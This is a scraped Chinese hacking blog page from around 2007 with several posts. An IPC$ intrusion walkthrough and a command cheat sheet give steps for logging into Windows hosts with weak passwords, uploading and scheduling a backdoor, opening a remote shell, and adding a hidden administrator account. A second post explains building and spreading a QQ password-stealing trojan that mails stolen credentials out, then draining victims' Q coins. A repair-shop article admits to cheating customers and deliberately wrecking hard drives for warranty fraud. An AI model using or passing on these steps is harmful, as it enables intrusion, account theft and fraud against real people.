      错误号1326,未知的用户名或错误密码 : 原因很明显了;

      错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)

      错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。

      4,关于ipc$连不上的问题比较复杂,没有总结出一个统一的认识,在肉鸡上实验有时会得出矛盾的结论,十分棘手。 而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。

      5,怎样打开目标的IPC$?

      答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是不行的话(比如有防火墙,杀不了)建议放弃。

      6,怎样映射和访问默认共享?

      答:使用命令 net use z: \目标IPc$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘,其他盘类推。

      如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy muma.exe \IPd$pathmuma.exe 。或者再R射也可以,只是不用用户名和密码了:net use y: \IPd$ 。然后 copy muma.exe y:pathmuma.exe 。当路径中包含空格时,须用""将路径全引住。

      7,如何删除映射和ipc$连接?

      答:用命令 net use \IPipc$ /del 删除和一个目标的ipc$连接。

      用命令 net use z: /del 删除映射的z盘,其他盘类推。

      用命令 net use * /del 删除全部。会有提示要求按y确认。

      8,连上ipc$然后我能做什么?

      答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。

      9,怎样防止别人用ips$和默认共享入侵我?

      答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。

      1,先把已有的删除

      net share ipc$ /del

      net share admin$ /del

      net share c$ /del

      …………(有几个删几个)

      2,禁止别人空连接

        首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous(DWORD)的键值改为:00000002。

        3,禁止自动打开默认共享

        对于server版,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer(DWORD)的键值改为:00000000。

      对于pro版,则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的键值改为:00000000。

      如果上面所说的主键不存在,就新建一个再改键值。

      B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)

      net stop lanmanserver

      可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。

      C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。

      D、还有一个办法就是装防火墙,或者端口过滤。

      结束进程:ntsd -c q -p PID

    转自:中国黑客联盟
    (k T Y~Ye'X0

    查看(656) 评论(0) 收藏 分享 圈子 管理

  • Dos入侵示例

    2007-09-16 17:17:06

    DOS入侵示例
    #kfDvh6g3W7A!f0这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)

      1. C:\>net use \\127.0.0.1\IPC$ "密码" /user:"用户名"

      一般用流光,通过扫描弱口令来得到,管理员帐号和密码.

      2. C:\>copy srv.exe \\127.0.0.1\admin$

      先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

        

      3. C:\>net time \\127.0.0.1

      查查时间,发现127.0.0.1 的当前时间是 2004/6/15 上午 11:00,命令成功完成。

        

      4. C:\>at \\127.0.0.1 11:05 srv.exe

      用at命令启动srv.exe吧

      5. C:\>net time \\127.0.0.1

      再查查到时间没有?如果127.0.0.1 的当前时间是 2004/6/15 上午 11:05,那就准备开始下面的命令。

        

      6. C:\>telnet 127.0.0.1 99

      这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

      虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

        

      7.C:\>copy ntlm.exe \\127.0.0.1\admin$

      用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

        

      8. C:\WINNT\system32>ntlm

      输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

      9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

      为了以防万一,我们再把guest激活加到管理组

      10. C:\>net user guest /active:yes

      将对方的Guest用户激活

      11. C:\>net user guest 1234

      将Guest的密码改为1234,或者你要设定的密码

      12. C:\>net localgroup administrators guest /add

      将Guest变为Administrator(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算

      13.使用nb2的sql工具。远程执行dos命令

      net start telnet 开telnet服务

      net user mint mint /add 添加用户mint密码为mint

      net localgroup administrators mint /add 将帐号mint升级为管理员

      7,使用3389登陆。发现登陆用户已满。不用怕。我们把他踢出去。

      8,telnet对方ip。发现需要NTLM 身份验证。怎么办?放弃不是黑客的追求。

      9,我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。

      10,找到c:\winnt\system32\cmd.exe 建立一个快捷方式到桌面。

      11,修改cmd的快捷方式属性为允许其他身份登陆。

      12,然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint

      13,telnet对方ip.直接可以登陆对方电脑了。

      使用命令

      c:\query user 查看对方目前终端登陆状况。

      运行命令

      c:\logoff 1 踢出去一个管理者

      再用c:\query user检查一便~~

      ok了

      14,使用3389远程终端登陆。

      入侵中可能会用到的相关命令

      请注意命令适用于本地还是远程,如果适用于本地,你只能在获得远程主机的shell后,才能向远程主机执行。

      1 建立空连接:

      net use \\IP\ipc$ "" /user:""

      2 建立非空连接:

      net use \\IP\ipc$ "psw" /user:"account"

      3 查看远程主机的共享资源(但看不到默认共享)

      net view \\IP

      4 查看本地主机的共享资源(可以看到本地的默认共享)

      net share

      5 得到远程主机的用户名列表

      nbtstat -A IP

      6 得到本地主机的用户列表

      net user

      7 查看远程主机的当前时间

      net time \\IP

      8 显示本地主机当前服务

      net start

      9 启动/关闭本地服务

      net start 服务名 /y

      net stop 服务名 /y

      10 映射远程共享:

      net use z: \\IP\baby

      此命令将共享名为baby的共享资源映射到z盘

      11 删除共享映射

      net use c: /del 删除映射的c盘,其他盘类推

      net use * /del /y删除全部

      12 向远程主机复制文件

      copy \路径\srv.exe \\IP\共享目录名,如:

      copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内

      13 远程添加计划任务

      at \\ip 时间 程序名,如:

      at \\127.0.0.0 11:00 love.exe

      注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径

      14 开启远程主机的telnet

      这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求:

      1)目标开启了ipc$共享

      2)你要拥有管理员密码和帐号

      3)目标开启RemoteRegistry服务,用户就该ntlm认证

      4)对WIN2K/XP有效,NT未经测试

      命令格式:OpenTelnet.exe \\server account psw NTLM认证方式 port

      试例如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90

      15 激活用户/加入管理员组

      1 net uesr account /active:yes

      2 net localgroup administrators account /add

      16 关闭远程主机的telnet

      同样需要一个小程序:ResumeTelnet.exe

      命令格式:ResumeTelnet.exe \\server account psw

      试例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator ""

      17 删除一个已建立的ipc$连接

      net use \\IP\ipc$ /del

      (本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创http://ccbirds.yeah.net)

    查看(636) 评论(0) 收藏 分享 圈子 管理

  • 黑客如何盗QQ号码,而得到Q币。

    2007-03-30 22:32:02

    如何免费得到Q币,这是许多黑客菜鸟们最感兴趣的吧!其实要想安全可靠的得到免费Q币,并不是一件简单的事情——在很早以前,大家可以破解别人的ADSL密码,直接到互联星空充值Q币;不过后来ADSL帐号与用户的电话线绑定后,这个方法就失效了;再后来有人又通过木马控制别人的电脑,让电脑成为代理服务器到互联星空充值,可是后来互联星空又加上了代理检测……现在想免费得Q币是很困难的,其实转换一下思路,也许方法很简单哦!

      一、免费拿Q币的简单思路

      其实我们可以通过间接的方法来得到Q币——制作盗QQ号的木马,盗取大量的QQ号;在这些QQ号中往往会带有一些Q币,通过盗Q木马查看QQ号上的Q币,或者通过QQ批量自动登录,查看得到的QQ帐户上有Q币,再将这些号码上的Q币兑换成购物券赠送给自己……

      二、制作盗Q木马

      与普通的盗Q木马不同,我们现在要制作的盗号木马不仅要盗取别人的QQ号及密码,还要获得该QQ号上的Q币信息。这里我们使用一个名为“呼噜QQ大盗综合版”的工具(如图1),呼噜QQ大盗综合版是目前最牛的QQ木马,可以获取用户Q币、QQ积分、QQ游戏点等信息。由于完美破解了QQ2006键盘保护,密码框不会出现红叉叉,可以通杀所有版本的QQ。再加上采用特殊的线程插入技术,无启动项、无进程,可以有效的突破各类防火墙!

    图片可在新窗口打开 style="WIDTH: 400px; CURSOR: pointer" src="http://www.knowsky.com/img2005/68a28in9h19js.JPG" border=1>

      运行呼噜QQ大盗后,可以选择设置网页和邮件两种收信方式。勾选“邮箱收信设置”后,输入接收QQ号码的邮箱及发信邮箱等信息即可。网站收信方式也很简单,将呼噜QQ大盗程序压缩包中的“out.asp”上传到网站空间中,在“ASP地址”中输入网页地址即可。

      小提示采用网页收QQ号方式时,盗取的QQ号默认保存到同路径下的“QQ.txt”文件中,为了防止其他人窃取我们的果实,最好将这个文件改名。可用记事本打开“out.asp”文件,将其中的“strLogFile="QQ.txt" strLogFile1="QQJF.txt"”中的“QQ.txt”和“QQJF.txt”改为其它的文件名(如图2)。

      最重要的设置项是勾选右侧“其它高级设置”中的“获取Q币信息”,生成的盗Q木马就可以自动检测显示相应QQ号上的Q币数目了。另外还可以设置获取积分、游戏币等信息,在运行木马后删除木马文件等。最后点击“生成木马”按钮,就可以生成一个功能超强的盗Q木马了。将生成的盗Q木马加上壳后,想办法发送给别人,或者在网吧中运行,以后就可以坐在家中等着鱼儿上钩了!小提示在生成盗Q木马时,可以勾选“自动传送设置”项,并在下方的列表框中输入迷惑性的文件名。该项功能有点类似QQ尾巴病毒,当某台主机上运行了这个盗Q木马后,除了可盗取QQ密码外,还会自动在发送QQ信息时将木马文件传送给其它QQ好友,进一步传播感染其它QQ用户,迅速盗得大量的QQ号码!

      三、导出QQ号码邮件

      将盗Q木马发送出去后,就可以检查网站下的“qq.txt”文件或直接接收邮件获得QQ号码了。这里以邮件接收方式为例,用Foxmail接收了大量盗Q邮件后(在短短的十余天内,笔者就盗取了200多个QQ号码),在QQ盗取邮件中可以查看到该QQ用户登录密码及Q币信息(如图3)。

      将所有帐户上有Q币的QQ号码及密码导出,在Foxmail中选择多个指定的邮件,然后点击菜单命令“文件”→“保存为文本”(如图4),将邮件内容导出保存为一个文本文件。用记事本打开此文本,删除其中的邮件头信息,并将其中的“帐户:”替换为空格;将“帐户密码:”替换为“/”。也就是按照一行一个QQ号和登录密码的形式保存,每行的格式为:“QQ号/QQ密码”,替换后的文本文件形式如图5所示。这样保存的目的是方便后面的批量登录QQ号,不用一个一个的复制粘贴QQ号与密码了。

      四、群登QQ号码

      保存了QQ号码记录文件后,可使用名为“QQ群登快手”的软件,批量自动化登录所有有Q币的帐号。运行QQ群登快手后,点击界面中的“选项”按钮,打开选项设置对话框,程序会自动寻找电脑中已安装的QQ/TM,如果未找到,可自行设定QQ/TM主程序所在路径(如图6)。在“QQ程序启动前/中延时”项处可设置QQ号码自动登录的间隔时间,一般设置为30秒比较好。设置完毕后保存返回程序界面。

      点击界面中的“导入”按钮,在向导提示下,一步步指定刚才保存的QQ号码记录文件,导入成功后会在中间的列表框中显示将会自动登录的QQ号码(如图7)。点击“立即群登”按钮,即可开始自动登录导入的QQ号码了。

      小提示在群登过程中,随时可以暂停自动登录,这样可以方便进行下面的Q币转移操作,操作完某个QQ号后,可以恢复继续自动登录下一个QQ号码。

      五、巧盗QQ币

      使用QQ群登快手自动登录上了有QQ币的QQ号码后,是不能直接将QQ币赠送转移到自己的QQ号码上的,只有通过转化成购物券的形式才能进行赠送。

      在登录的QQ号图标上点击右键,选择弹出菜单“娱乐”→“QQ秀商城”,打开QQ秀商城后,在左侧的QQ用户个人信息栏下方可以看到购物券赠送区(如图8)。在“QQ号码”中输入自己的QQ号码,在“金额”中可以选择赠送的购物券数量,再点击“送给他/她”按钮,即可成功的将购物券转移到自己的QQ号码上了。

      再按同样的方法,将所有QQ上的Q币都转换成购物券,赠送到自己的QQ号上,你就成了一个Q币大富翁了,想买什么衣服道具就随便你了!

    查看(977) 评论(3) 收藏 分享 圈子 管理

  • 揭露电脑维修内幕!

    2007-01-21 00:35:35

    一、杀黑!不为人知的二级维修内幕

      可能大家还不知道,现在市面上那些维修电脑故障的店铺多数都不会真正修理电脑硬件,很多维修店铺均属于二级维修。现在在电脑城里面那些从事显示器、打印机、硬盘、主板、笔记本电脑维修的“专家”,多数都是从修理家电那边游过来的,只是为了市场需求而改行做电脑二级维修罢了。对于这些维修人员来说,只要其接收能力强,学习速度快,并快速适应市场需要,很快就成了相应的“专家”,一些不正规的所谓专业维修公司也大多由此类人员组成。

      正因为大家对计算机二级维修的不了解,其内的“学问”很大,利润空间也很大。同时因为电脑市场的形成时间短,国家管理部门也没有一个相应的管理标准和办法,都是依据市场行情自由定价。关于二级维修的内幕已经有很多报道了,今天我们来说一些比较典型的事情。

      1、显示器

      1)不加电或加电无图像显示

      显示器不加电的原因很多,电源线断,保险丝报,开关电源电路烧毁都会造成显示器不加电无法工作。

      去年有个客户送了一台IBM笔记本来公司修理,故障现象是接通电源后开不了机。我拿起万用表一测,电源适配器没有电压输出,当时也以为是电源适配器坏了,就告诉客户维修费200元。
    但是后来经过仔细检查,原来真正的原因是:客户经常把电源适配器的电源线盘起来携带,时间长了,220V的电源线内部断线,造成电源适配器得不到市电,当然就没有19V直流电源输出了,笔记本也就不能工作。于是,我去市场上花了五块钱买了一根一模一样的电源线,稍微做了点手脚,搞旧一点,看起来像客户原来的电源线。就这样,客户的故障解决,200元到手。简单吧!

      厂家的售权维修站也是如此,送上门的肥肉大家都喜欢吃。我们公司曾经收到过一台国际名牌17寸显示器,不加电,因为过了保修期,考虑到该品牌显示器配件不好买,即使查出问题也修不了,所以就把显示器发到其设立在省城的维修站。过了三天,维修站打电话通知维修费100元,等我们把钱汇过去,收到显示器后,维修单上写着“更换FUSE”。FUSE不就是保险丝吧,换一个保险丝就要100元!

      此外,国内某品牌的一款显示器有个典型的故障,在使用一年以上时,其PCB板上二次供电回路中的L304的一个引脚就会因腐蚀而虚焊,导致行扫描电路无电压供应,显示器表现为能加电,电源指示灯亮,但就是没有图像显示。有时候多开几次机或等上十来分钟显示器就正常了,但是如果不及时修复,其表现会越来越严重,最后根本就没有图像出现,内部可能还会有“叭叭”的声音。其实此问题的解决只需要五分钟时间,拆开显示器,拿电烙铁补焊一下L304的两个引脚就解决问题。但此问题只要送到维修公司,没有百八十元绝对下不来!

      2)、偏色或图像变形

      造成显示器图像偏色的原因其实有很多,显示器的信号线松动,接触不良,显示器的OSD菜单色温调节不当,显示器的三基色设置不当都会导致显示器明显偏色。不过,这些问题多数都可以通过检查和调节OSD菜单的设置就可以解决。如果你把这些问题当成故障送到维修公司,那你也只能充当冤大头了,虽然只是略微调节一下即可,但是维修的商家绝对不会和你明说,这类收费一般在50元以上,遇到黑心的商家,那就更难说了,什么故障都可以说出来。

    2、电脑主机

      电脑主机会维修的人最多,几乎每一个电脑公司都会,其间的问题也最多。对于三四个人的小公司,多数都是老板自己亲自带队,对于送上门的生意,根本不考虑信誉,是能杀就杀,该宰就宰。所以我还是劝大家,对于电脑的维修一定要找大型的专业的维修公司,最好没有一个明确老板的公司,这类公司的收费一般是明码标价,不会暗地宰人,会让你“死”得明明白白。

      3、打印机
      现在家里使用打印机的多了,最经常出现的问题就是喷墨打印机的打印效果差,打印字迹模糊的问题。因为喷墨打印机因为长时间不用或环境问题容易出现堵头的现象,这时打印的文章或照片就会明显缺色或字迹不完整。解决的方法也很简单,使用打印工作里面的清洗喷嘴就可以了。如果不行再试着校准一下打印头应该就可以解决问题。

      如果你把此类故障的打印机送到维修公司,即使你的打印机是花199元买的,也要收你50元的维修费。其实对于此类问题,即使你的打印机不经常打印,也要每个月对打印机加电充墨一次,以防止供墨通道因长时间不用而干涸造成堵头现象。

      4、投影仪

      投影仪多数都是单位使用的,几万块钱的机器买了,花几千块钱维修也很正常。我在这里只是想告诉大家,一个普通的投影仪的灯泡只需要百八十元,但卖给客户却可以卖到六七百元,甚至上千元!因为这里的行情没人知道。在计算机三包法里,投影仪灯泡的保修时间只有半年,因为它很容易损坏。

      5、笔记本电脑

      笔记本电脑的集成度高,可更换部件少,配件市场上难寻,所以维修难度大,对维修人员的技术水平要求高。但实际上,真正要维修人员更换核心芯片的主要部件的机器很少,单单因为接触不良问题造成笔记本不启动,加电无反应之类的问题占到笔记本故障维修的30%还要多。如CPU接触不良,内存接触不良,键盘与主板的引线接触不良,显示屏与主板的信号线接触不良,硬盘IDE口与主板接触不良都会导致笔记本电脑无法工作。对此类故障的解决只需要重新拔插一下就可以解决,需要的只是胆大心细和善于观察,但是此类问题的维修费至少也要在500元以上,多的可能需要一二千元。

      6、数码产品

      因为数码产品上市时间短,集成度高,目前市场上能够对数码产品进行芯片维修的人员不多,多数还需要把故障机器发到厂家在国内的为数不多的维修站进行维修。保内不花钱还可以,而保外付费就吓人了。前不久,公司一个客户把佳能A75的液晶屏不小心搞破了。当询问厂家的维修费用时,报价为500元,比笔记本的维修还贵呀!要知道,该数码相机的液晶屏如果是批量采购的话,一片也就几十元钱。

    二、正规商家对于常见配件故障的处理
      1、显示器

      显示器在使用过程中出现的问题也非常多,明显的故障有不加电,能加电但没有图像显示,或者图像抖动明显,缺颜色等;隐蔽性的故障有偶尔黑屏,局部图像发虚,关机有时有亮点等。虽然三包法规定的显示器在七天之内可以退货,十五天之内可以换货,但多数厂家对经销商都有三个月内可以换新的承诺,只是对经销商承诺,包括三星,LG,PHILIPS等知名品牌。这种故障的换新必须客户的机器附件包装齐全才能更换,否则只能维修。

      目前市面上销售的显示器的外壳多数都是采用了喷塑工艺处理,在原来的工程塑料的表面上喷涂了一层珠光银灰,珍珠白,科技蓝,香槟金等颜色。这种喷涂的颜色在使用一段时间后就会因为磨损而脱落,不过这种脱落现象出现的时候多数都在二三年之后了。这里有一个不得不说的例子:某国际品牌的一款显示器外观设计新颖,体积小巧,明显的与其他同样17寸的CRT显示器不一样,很受市场欢迎。不过,该型号显示器的故障率不容乐观,并且2002年上市的一批可能是工艺的缺陷,其表面的喷涂层非常不牢靠,在搬运过程中只要销微有磨损就会造成显示器表面的涂层大面积脱落。经常出现客户送修显示器时外观很新,但从维修站修好回来时,因为多次搬运和拆修,表面受到磨损露出塑料的本来颜色,多数客户在这种情况下都会要求换新显示器。当然,显示器用了都一年了,换新是不可能的,只能给显示器换一个壳,换一个壳的价格是一百五十元。在搬移此型号显示器时,一定要先用防潮塑料袋把显示器包好,再使用“原”包装搬运。如果不是原包装,在运输过程中只要有振动,表面涂层也会脱落。

    去年,我在公司就处理了这么一起客户投诉。客户是去年5月6日购买的DIY电脑,显示器刚到家二十多天就坏了,在6月初就为客户更换了一台新的该型号显示器。到了去年11月25日,客户又把显示器拿来返修,故障状况为显示器只有一条亮线,没有图像出现。上门检查后,发现的确是显示器出现问题,就让公司的配送人员把显示器拖回公司。客户因为购买一台电脑连续两次都是显示器坏,对该品牌显示器的信心完全丧失,也同时来到公司强烈要求更换其他品牌显示器。

      当时我与客户交谈了近两个小时,客户同意了对自己的显示器进行维修。本来事情已经圆满结束,但客户在检查自己的显示器时发现显示器的外壳有大面积的磨损,这是因为公司的配送人员用自行车搬运显示器,固定用的绳子在搬运过程中造成显示器的外壳上大面积涂层脱落,所以客户一看此情况,马上改变了刚才的协议,要求必须更换显示器。看到客户这种情况,我也无可奈何,心里明知道这台显示器厂家是不可能给予更换的,也只好同意为客户更换显示器。等客户走后,我马上和厂家维修站联系,要求厂家对这台显示器故障排除后给予换壳,重新包装,以达到“换新”的目的。当然这些操作是要付费的,当时是总共花了220元的翻新费用。

      过了近两个月,显示器终于“换”回来了。可“好事多磨”,这台新显示器送到客户家里没有半个月,同样的故障又出来了,还是一条亮线,我听后气得差点吐血!这次没有办法了,最后只能打报告为客户更换其他品牌显示器,其间的差价由客户补齐,此事才算完全结束。

    2、内存

      内存隔三差五的就第一次开机报警或点不亮。内存报警在计算机的故障维修中可以说是最简单的硬件故障,懂一点的人都知道,只要把内存拔下来,再插一遍就可以了。不过,如果是每隔十天半个月的就报警一次,开机黑屏无图像显示,那就不是什么简单故障了。总不能买一台电脑回家,总要每次拔插一下内存条才能使用吧?

      其实这种故障的原因有四种:
    1)内存条的质量低劣,其金手指没有采用镀金处理或者说处理的工艺很差,在经历数次拔插内存后或在稍微差一点的环境中金手指就氧化生锈,造成内存与主板的内存条接触不良而开机报警。
    2)内存条与主板兼容性不好,一是内存条的工艺问题,设计得过薄,与内存插槽的簧片接触不实;再一原因就是主板与内存条兼容性不好。可能刚买机器的时候没有问题,但随着元器件的老货,最后出现兼容性差,内存与主板不能配合正常工作。

      3)主板在制造有缺陷,或运输过程中造成主板变形,致使内存插槽变形,无法与内存条密切配合而经常报警。去年曾经在微星主板上出现过此类问题,整批的机器都有问题,最后只能全部更换主板。

      4)主板的BIOS软件设计有BUG,在主板加电自检过程中,不能完成初使化,而造成开机后不启动,也不报警。这种情况在200年前后热销的微星MS6199主板上经常出现。本来用得好好的电脑,突然开机不启动。经过若干次的CMOS放电,拔插显卡,CPU,内存后突然又能够启动了,然后一直正常。但或许是半年或一年后,故障会再次出现。

      实际维修中的解决方法:

      1)此类问题在刚开始出现时,都是拆开机箱,把内存拔插一下就可以解决问题。

      2)实际上对内存金手指氧化,其原因有二:一是内存的金手指的镀金工艺差,在实际使用过程中的拔插次数少,容易氧化生锈。二是装机和维修人员在取拿内存过程中只接用手接触内存的金手指,致使汗液残留在内存的金手指上,造成一段时间后内存的金手指氧化而开机报警。所以此类问题的解决还应加强装机和维修人员的标准化意识。

      3)此类问题在单独测试时,既不是内存问题,也不是主板问题,所以电脑经销商和上级经销商在处理此类问题时,是不会接受维修的。这时因为存在此类问题的主板或内存返厂既查不出故障,也无法进行维修。解决的方法只能以“语言”搞定客户,“此问题是小问题,只需要拔插一下内存就搞定”。但多数不会告诉你,如果您把内存插反了,那一开机就会造成主板和内存烧毁。

      4)多数电脑公司都是拔插内存。当问题出现多次时,就教客户自己拔插内存。如果半年出现一次,一般人还能够忍受,但是十天半个月的就出现一次,那就难以忍受了。这时,电脑公司的维修人员会用橡皮仔细认真的擦洗内存,再用扎带将内存捆扎结实,最后用胶枪将内存的两侧进行封固。如此处理后情况会好一些,但仍然不能从根本上解决问题。

      正确处理方法:

      1)首先试着升级主板的BIOS,看故障是否能够排除。

      2)对于因内存与主板兼容性不好或者是内存偏薄时,只能更换内存或主板。
    3、显卡

      时不时的出现开机后显卡驱动程序丢,进入桌面后只能显示16位颜色,同时图标变得老大。

      故障原因:

      1)此类问题在DIY机器中比较常见,主要原因是显卡与主板不兼容,比较典型的是小影霸6817R显卡与技嘉或微星的8IE533主板,再就是FX5200显卡与INTEL 845或865芯片组的主板搭配使用时,会经常出现开机驱动程序丢失,图标变大,要不就是死机,花屏等问题。

      2)再一个可能的原因就是主板的AGP插槽的供电不足(也可能是因为显卡的耗电量大),会因工作环境的温度的不同而出现故障机率大小不同。比较显著的见于一些低端主板和集成显卡的主板上。

      实际维修中的解决方法:

      1)对于因为AGP供电不足造成的问题,可以试着从BIOS里调整AGP的供电电压,看故障能否解决。或者是更换功率大一点的电源。

      2)对于比较典型的不兼容问题,经销商处理起来也比较头疼。在购机两三个月内相对比较容易处理,可以更换其他型号的显卡;如果是购机已经半年或一年左右时,就很难处理了。一是显卡过保了;二是使用时间过长,无法从厂商那里获得资源;三是单独测试显卡主板都没有问题。解决的方法也不过是拔插一下显卡,重装一下显卡驱动或者更换最新的显卡驱动版本,重刷显卡的BIOS版本等方法。

      正确处理方法:

      1)当客户把机器买回家后,应该进行长时间拷机,如果发现问题时及早报修,做到问题早发现,早解决。

      2)此类问题即使返厂维修也因检测不到故障而无法维修。同时根据三包法规定,显卡和主板属于选购件,出现问题时应要求经销商给预更换全新的显卡或主板,将问题彻底解决。千万不要听从维修人员说是小毛病,掉了驱动再装一下就OK了。

      例:去年8月份,公司销售的某品牌显卡与技嘉的8IE533主板出现兼容性问题。因为公司销售该显卡的数量大,虽然出现的问题不是很多,但我向生产厂商汇报此问题时,将情况稍微扩大,说是有六七台DIY机器都出现此问题,即使更换最新牌的驱动程序也不能解决。因为问题严重,生产厂商对此问题也很重视,最后将显卡全部予以更换加强版本的显卡,并且不补其间的差价,此事得到完美解决。
    4、硬盘

      硬盘经常出现读盘长时间无反应,格式化时有坏道,但拿到公司一低格,再格式化好好的,一个坏道也没有。但用不了几个月,就又出现读盘长时间无反应。

      此问题类似于读盘不稳定,应首先排除电源不足或不稳定造成的干扰因素,然后再考虑此问题是硬盘自身缺陷造成的。硬盘在三包法规定中属于外设,按规定只能先进行维修。如果连续两次维修仍然出现同样故障,就必须给予换新了。不过,实际上多数电脑公司在处理此类问题时,只要能够肯定是硬盘故障就会对客户直接换新处理。

      例:特别像硬盘自身缺陷造成的数据丢失,坏道不断,但低格时没有问题发现的故障处理,我们自己明明知道此类问题即使发回上家也是原样发回,只好自己想办法解决,对这些硬盘进行特殊处理,像西捷,迈拓,西部数据可以把硬盘用毛巾包起来往桌子上摔,一摔一个坏(编辑提示:在产品正常情况下,采取这种处理方法就太不道德了)。但如果是IBM的玻璃盘片的硬盘,这种方法就不行了,最有效的方法就是对硬盘的数据接口进行高电压强电流的短时间电击。在去年夏天时候,我每天都安排一个技术水平好的专门做此类工作。经过这样处理的硬盘,厂家都会给予换新处理,避免了多次返修客户投诉的麻烦。

      5、主板

      主机在使用一两年以后,因为主板上的滤波电容漏液而失容,但不是鼓泡,从表面看不出任何痕迹。经常出现在使用过程中突然死机,有时在启动过程中也死机。但检查CPU温度,南北桥温度,显卡和内存温度均正常。

      大家在网上也经常会看到一些厂家的主板上的电解电容鼓泡漏液而失容,导致计算机经常无法开机,点不亮,经常出现死机等现象,对于这种故障,厂家一般也是保修的,直接更换电解电容就行了。但还有一些问题,就是虽然电容漏液了,可没有鼓泡,电容都还是好好的,就是主板经常出现不稳定的无法开机,加电黑屏,死机之类的故障。因为故障的不稳定,就会出现多次维修仍然不能修复。这是因为目前的主板维修都还是厂家直接做的,经销商只是把客户的坏主板收下来,做一个初步的故障检验,发给厂家。厂家收下主板后,也会做一下初检,正因为每天厂家收到的主板非常多,像此类不稳定的故障一般不容易发现,就会当成没有问题的主板再给发回来,这就造成了多次往返,但总不能解决问题。

      此类问题,如果是在一年内,就可以要求经销商直接更换新主板;如果如果是二三年,那就不太好,只能按厂家的质保进行了,或者自己花钱找人修。

    查看(104) 评论(1) 收藏 分享 圈子 管理

  • 黑客必学DOS

    2007-01-21 00:27:04

    黑客必学→DOS
    net use $">\\ip\ipc$ " " /user:" " 建立IPC空链接
    net use $">\\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
    net use h: $">\\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
    net use h: $">\\ip\c$ 登陆后映射对方C:到本地为H:
    net use $">\\ip\ipc$ /del 删除IPC链接
    net use h: /del 删除映射对方到本地的为H:的映射
    net user 用户名 密码 /add 建立用户
    net user guest /active:yes 激活guest用户
    net user 查看有哪些用户
    net user 帐户名 查看帐户的属性
    net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
    net start 查看开启了哪些服务
    net start 服务名 开启服务;(如:net start telnet, net start schedule)
    net stop 服务名 停止某服务
    net time \\目标ip 查看对方时间
    net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
    net view 查看本地局域网内开启了哪些共享
    net view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享
    net config 显示系统网络设置
    net logoff 断开连接的共享
    net pause 服务名 暂停某服务
    net send ip "文本信息" 向对方发信息
    net ver 局域网内正在使用的网络连接类型和信息
    net share 查看本地开启的共享
    net share ipc$ 开启ipc$共享
    net share ipc$ /del 删除ipc$共享
    net share c$ /del 删除C:共享
    net user guest 12345 用guest用户登陆后用将密码改为12345
    net password 密码 更改系统登陆密码
    netstat -a 查看开启了哪些端口,常用netstat -an
    netstat -n 查看端口的网络连接情况,常用netstat -an
    netstat -v 查看正在进行的工作
    netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
    netstat -s 查看正在使用的所有协议使用情况
    nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
